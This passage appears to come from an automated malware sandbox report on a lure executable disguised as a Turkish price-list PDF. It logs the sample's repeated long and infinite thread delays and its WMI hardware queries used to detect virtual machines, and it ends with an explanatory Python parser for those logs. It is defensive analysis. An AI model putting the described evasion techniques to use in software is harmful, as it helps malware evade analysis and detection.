                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394733s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394625s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394406s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394296s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394187s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7364Thread sleep time: -2394077s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 2104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep count: 34 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -31359464925306218s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2400000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399891s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7608Thread sleep count: 8056 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7608Thread sleep count: 1781 > 30
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399657s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399532s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399422s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399313s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399188s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2399063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398938s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398703s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398594s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398469s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2398110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397989s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397744s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397625s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397516s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397281s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2397063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396947s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396828s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396609s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396280s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396172s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2396063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395953s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395844s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395485s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395360s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2395110s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394985s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394860s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394719s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394610s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394500s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394391s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe TID: 7544Thread sleep time: -2394266s >= -30000s
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2400000
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399883
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399765
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399638
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399531
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399422
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399312
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399203
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2399094
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398984
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398874
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398765
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398663
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398547
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398393
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398161
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2398031
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397921
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397812
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397703
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397594
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397484
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397375
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397264
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397156
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2397046
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396937
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396828
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396718
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396609
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396500
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396390
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396281
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396172
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2396047
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395937
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395828
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395718
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395424
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395297
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395187
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2395078
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394968
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394859
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394750
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394640
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394531
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394421
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394312
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394203
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Thread delayed: delay time: 2394093
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2400000
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399890
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399781
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399367
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399262
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399156
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399046
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398937
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398828
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398718
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398609
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398499
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398390
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398281
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398171
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398062
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397953
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397843
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397732
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397625
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397511
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397375
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397265
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397156
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397046
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396834
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396593
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396484
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396375
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396265
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396156
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396046
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395937
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395827
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395718
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395609
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395499
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395390
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395281
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395171
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395062
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394953
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394843
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394733
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394625
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394515
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394406
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394296
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394187
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394077
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2400000
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399891
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399766
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399657
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399532
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399422
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399313
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399188
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2399063
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398938
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398813
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398703
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398594
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398469
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398360
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398235
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2398110
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397989
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397860
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397744
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397625
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397516
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397391
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397281
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397172
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2397063
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396947
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396828
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396719
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396609
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396500
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396391
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396280
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396172
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2396063
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395953
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395844
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395719
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395610
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395485
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395360
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395235
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2395110
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394985
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394860
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394719
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394610
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394500
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394391
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Thread delayed: delay time: 2394266
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, 00000003.00000002.4146532322.0000000005F50000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Memory allocated: page read and write | page guard
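The delay and WMI evidence above is easier to read once it is aggregated per process. 2400000 ms is a 40-minute wait; the descending values beneath it (2399883, 2399765, ...) are that same wait being re-armed with the remaining time after each wake, so they must not be summed; and 922337203685477 is TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue divided by 10000 ticks per ms), i.e. an effectively infinite wait, not a delay. The "Thread sleep time: -2394391s" lines carry the same millisecond figures as the delay lines (2394391 appears in both), so the "s" suffix is the report's rendering, not a unit. The Python below is an added example written for this page, not Joe Sandbox code: it parses a subset of the evidence lines copied from above, separates finite delays from the infinite sentinel, and flags the hardware WMI classes (Win32_BaseBoard, Win32_Processor) that the sample enumerates to fingerprint a virtual machine. The 3-minute threshold and the VM_CLASSES list are assumptions chosen for the example.

```python
"""Aggregate Joe Sandbox delay / WMI evidence per process.

Added example for this report (not Joe Sandbox code). SAMPLE_LINES are copied
from the evidence list above; LONG_SLEEP_MS and VM_CLASSES are assumptions.
"""
import re
from collections import defaultdict

# Int64.MaxValue / 10_000 ticks-per-ms == TimeSpan.MaxValue in milliseconds.
# A .NET wait on TimeSpan.MaxValue shows up in the report as this sentinel.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000          # 922337203685477

LONG_SLEEP_MS = 3 * 60 * 1000                    # assumption: 3 min, a typical sandbox budget
VM_CLASSES = {                                    # assumption: WMI classes commonly read to fingerprint a VM
    "Win32_BaseBoard", "Win32_Processor", "Win32_ComputerSystem", "Win32_BIOS",
}

SAMPLE_LINES = [  # copied from the report above
    r"Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior",
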